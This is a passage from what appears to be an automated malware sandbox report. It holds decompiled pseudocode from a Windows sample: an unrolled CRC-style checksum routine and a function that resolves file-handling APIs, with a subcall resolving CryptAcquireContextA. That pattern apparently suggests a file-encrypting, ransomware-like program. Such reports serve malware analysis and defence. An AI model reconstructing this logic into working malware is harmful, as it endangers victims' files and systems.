& 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
                                                            							_t73 =  &(_t79[2]);
                                                            							_t85 = _t85 - 1;
                                                            						} while (_t85 != 0);
                                                            					}
                                                            					if(_a12 != 0) {
                                                            						do {
                                                            							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
                                                            							_t73 =  &(_t73[1]);
                                                            							_t32 =  &_a12;
                                                            							 *_t32 = _a12 - 1;
                                                            						} while ( *_t32 != 0);
                                                            					}
                                                            					return  !_t35;
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}












                                                            0x00405422
                                                            0x00405427
                                                            0x00405436
                                                            0x0040543d
                                                            0x00405447
                                                            0x0040544a
                                                            0x0040544f
                                                            0x00405465
                                                            0x0040547f
                                                            0x00405496
                                                            0x004054ad
                                                            0x004054c4
                                                            0x004054db
                                                            0x00405503
                                                            0x00405505
                                                            0x00405506
                                                            0x00405506
                                                            0x0040550d
                                                            0x00405512
                                                            0x00405514
                                                            0x00405527
                                                            0x00405529
                                                            0x0040552a
                                                            0x0040552a
                                                            0x0040552a
                                                            0x00405514
                                                            0x00405534
                                                            0x00405429
                                                            0x0040542c
                                                            0x0040542c

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                                                            • Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
                                                            • Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                                                            • Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040170A() {
                                                            				void* _t3;
                                                            				_Unknown_base(*)()* _t11;
                                                            				struct HINSTANCE__* _t13;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t20;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t23;
                                                            				intOrPtr _t24;
                                                            				intOrPtr _t25;
                                                            
                                                            				if(E00401A45() == 0) {
                                                            					L11:
                                                            					return 0;
                                                            				}
                                                            				_t18 =  *0x40f878; // 0x0
                                                            				if(_t18 != 0) {
                                                            					L10:
                                                            					_t3 = 1;
                                                            					return _t3;
                                                            				}
                                                            				_t13 = LoadLibraryA("kernel32.dll");
                                                            				if(_t13 == 0) {
                                                            					goto L11;
                                                            				}
                                                            				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
                                                            				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
                                                            				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
                                                            				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
                                                            				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
                                                            				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
                                                            				_t11 = GetProcAddress(_t13, "CloseHandle");
                                                            				_t20 =  *0x40f878; // 0x0
                                                            				 *0x40f890 = _t11;
                                                            				if(_t20 == 0) {
                                                            					goto L11;
                                                            				}
                                                            				_t21 =  *0x40f87c; // 0x0
                                                            				if(_t21 == 0) {
                                                            					goto L11;
                                                            				}
                                                            				_t22 =  *0x40f880; // 0x0
                                                            				if(_t22 == 0) {
                                                            					goto L11;
                                                            				}
                                                            				_t23 =  *0x40f884; // 0x0
                                                            				if(_t23 == 0) {
                                                            					goto L11;
                                                            				}
                                                            				_t24 =  *0x40f888; // 0x0
                                                            				if(_t24 == 0) {
                                                            					goto L11;
                                                            				}
                                                            				_t25 =  *0x40f88c; // 0x0
                                                            				if(_t25 == 0 || _t11 == 0) {
                                                            					goto L11;
                                                            				} else {
                                                            					goto L10;
                                                            				}
                                                            			}













                                                            0x00401713
                                                            0x004017d8
                                                            0x00000000
                                                            0x004017d8
                                                            0x0040171b
                                                            0x00401721
                                                            0x004017d3
                                                            0x004017d5
                                                            0x00000000
                                                            0x004017d5
                                                            0x00401732
                                                            0x00401736
                                                            0x00000000
                                                            0x00000000
                                                            0x00401751
                                                            0x0040175e
                                                            0x0040176b
                                                            0x00401778
                                                            0x00401785
                                                            0x00401792
                                                            0x00401797
                                                            0x00401799
                                                            0x0040179f
                                                            0x004017a5
                                                            0x00000000
                                                            0x00000000
                                                            0x004017a7
                                                            0x004017ad
                                                            0x00000000
                                                            0x00000000
                                                            0x004017af
                                                            0x004017b5
                                                            0x00000000
                                                            0x00000000
                                                            0x004017b7
                                                            0x004017bd
                                                            0x00000000
                                                            0x00000000
                                                            0x004017bf
                                                            0x004017c5
                                                            0x00000000
                                                            0x00000000
                                                            0x004017c7
                                                            0x004017cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
